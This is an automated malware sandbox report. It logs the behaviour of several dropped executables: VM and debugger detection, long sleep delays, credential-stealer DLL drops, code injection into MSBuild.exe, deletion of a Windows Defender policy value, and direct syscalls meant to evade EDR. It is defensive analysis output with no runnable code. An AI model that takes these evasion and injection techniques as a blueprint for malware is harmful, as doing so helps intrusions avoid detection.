Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\NetVoyager\nv.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Program Files (x86)\NetVoyager\nv.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: eROo1ugNChgONSxoiS6DxyMi.exe PID: 1028, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: NoCZBiPwAcSyoDte_ne2sJt7.exe PID: 2872, type: MEMORYSTR

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Memory allocated: 1210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Memory allocated: 2C30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Memory allocated: 2B30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Memory allocated: 840000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Memory allocated: 2490000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Memory allocated: AE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Memory allocated: 7D00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Memory allocated: 8D00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Memory allocated: 8EE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Memory allocated: 9EE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Memory allocated: A290000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Memory allocated: B290000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Memory allocated: 1D90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Memory allocated: 3750000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Memory allocated: 3670000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Memory allocated: 6040000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Memory allocated: 7040000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Memory allocated: 79F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Memory allocated: 89F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Memory allocated: 9310000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Memory allocated: 15A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Memory allocated: 3060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Memory allocated: 5060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Memory allocated: 2D80000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Memory allocated: 2F10000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Memory allocated: 4F10000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Memory allocated: E10000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Memory allocated: 2A20000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Memory allocated: 1040000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe

Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion

Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe

Code function: 10_2_0064871C rdtsc

10_2_0064871C

Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\DHDAFBFCFHID\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\DHDAFBFCFHID\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\DHDAFBFCFHID\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\DHDAFBFCFHID\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\DHDAFBFCFHID\mozglue.dll	Jump to dropped file
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	Dropped PE file which has not been started: C:\Windows\Temp\yqyegvqciyid.sys	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\DHDAFBFCFHID\vcruntime140.dll	Jump to dropped file

Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe TID: 6996	Thread sleep count: 90 > 30	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe TID: 6764	Thread sleep count: 205 > 30	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe TID: 6764	Thread sleep time: -41000s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe TID: 7720	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe TID: 7892	Thread sleep time: -33000s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe TID: 1072	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe TID: 1888	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe TID: 3584	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe TID: 984	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe TID: 7240	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe TID: 7216	Thread sleep count: 184 > 30
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe TID: 6260	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3664	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3668	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem

Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe

Code function: 10_2_004A7829 GetSystemTimes followed by cmp: cmp dword ptr [004bb094h], 0ah and CTI: jne 004A79F2h

10_2_004A7829

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Code function: 7_2_0040553A FindFirstFileA,		7_2_0040553A
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Code function: 7_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA,		7_2_004055DE

Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe

10_2_004A7829

Source: C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe

Code function: 15_2_00423440 GetProcessAffinityMask,GetSystemInfo,

15_2_00423440

Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	File opened: C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\__data__\	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	File opened: C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	File opened: C:\Users\user\	Jump to behavior

Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1965969296.0000013417198000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1949024405.0000013416757000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: nhgFsvIihRkKflacoB41
Source: eROo1ugNChgONSxoiS6DxyMi.exe, 00000009.00000002.2830297717.0000000004EC0000.00000004.08000000.00040000.00000000.sdmp, eROo1ugNChgONSxoiS6DxyMi.exe, 00000009.00000002.2703688839.0000000002491000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VBoxTray
Source: svchost.exe, 00000003.00000003.1743548566.000002123B244000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: eROo1ugNChgONSxoiS6DxyMi.exe, 00000009.00000002.2830297717.0000000004EC0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: sandboxierpcssGSOFTWARE\VMware, Inc.\VMware VGAuth
Source: svchost.exe, 00000003.00000002.2969880599.000002123B22B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: eROo1ugNChgONSxoiS6DxyMi.exe, 00000009.00000002.2703688839.0000000002491000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q#SOFTWARE\VMware, Inc.\VMware VGAuth
Source: svchost.exe, 00000003.00000002.2969500868.000002123B202000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: svchost.exe, 00000003.00000002.2969880599.000002123B23B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000003.00000002.2969880599.000002123B22B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000&00000

Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe

API call chain: ExitProcess graph end node

graph_7-16460

Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process queried: DebugPort

Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe

Code function: 10_2_0064871C rdtsc

10_2_0064871C

Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe

Code function: 10_2_00401006 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

10_2_00401006

Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe

Code function: 7_2_00418320 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

7_2_00418320

Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_006470A3 push dword ptr fs:[00000030h]		10_2_006470A3
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_02000042 push dword ptr fs:[00000030h]		10_2_02000042

Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Process token adjusted: Debug
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process token adjusted: Debug

Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Code function: 7_2_0041584A SetUnhandledExceptionFilter,	7_2_0041584A
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Code function: 7_2_0041585C SetUnhandledExceptionFilter,	7_2_0041585C
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_00403E01 SetUnhandledExceptionFilter,	10_2_00403E01
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_00401006 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00401006
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_004095A7 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_004095A7
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_004023BD _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_004023BD
Source: C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe	Code function: 15_2_004368B0 AddVectoredExceptionHandler,SetUnhandledExceptionFilter,	15_2_004368B0

Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: NoCZBiPwAcSyoDte_ne2sJt7.exe PID: 2872, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe

10_2_02000110

Disables Windows Defender (deletes autostart)

Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

Registry value deleted: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{43CCD916-4698-4801-BF19-31680FA09FC1}Machine\SOFTWARE\Policies\Microsoft\Windows Defender DisableAntiSpyware

Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	NtProtectVirtualMemory: Direct from: 0x7FF6E6D6342B	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	NtProtectVirtualMemory: Indirect: 0x7FF6E6D01BD1	Jump to behavior
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	NtProtectVirtualMemory: Direct from: 0x1415D9784
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	NtProtectVirtualMemory: Direct from: 0x7FF6E6DAA5F7	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe	NtUnmapViewOfSection: Direct from: 0x1415D9420	Jump to behavior
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	NtClose: Direct from: 0x141567F59
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	NtProtectVirtualMemory: Direct from: 0x7FF6E6D4F242	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	NtProtectVirtualMemory: Direct from: 0x7FF6E6DF09FE	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	NtOpenFile: Direct from: 0x7FF6E708B2BE	Jump to behavior
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	NtProtectVirtualMemory: Direct from: 0x14154A139
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	NtProtectVirtualMemory: Direct from: 0x7FF6E6DEA8D8	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe	NtProtectVirtualMemory: Direct from: 0x141800022	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	NtMapViewOfSection: Direct from: 0x7FF6E6D67FB2	Jump to behavior
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	NtProtectVirtualMemory: Direct from: 0x1415843E4
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	NtUnmapViewOfSection: Direct from: 0x1415610BF
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	NtProtectVirtualMemory: Direct from: 0x1417C681E
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	NtProtectVirtualMemory: Direct from: 0x7FF6E6D7CFF5	Jump to behavior
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	NtProtectVirtualMemory: Direct from: 0x1415CF01A
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	NtProtectVirtualMemory: Direct from: 0x14157527B
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	NtProtectVirtualMemory: Direct from: 0x7FF6E7017A70	Jump to behavior
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	NtProtectVirtualMemory: Indirect: 0x140F022FD
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	NtProtectVirtualMemory: Direct from: 0x7FF6E6DE8072	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe	NtProtectVirtualMemory: Direct from: 0x141547282	Jump to behavior
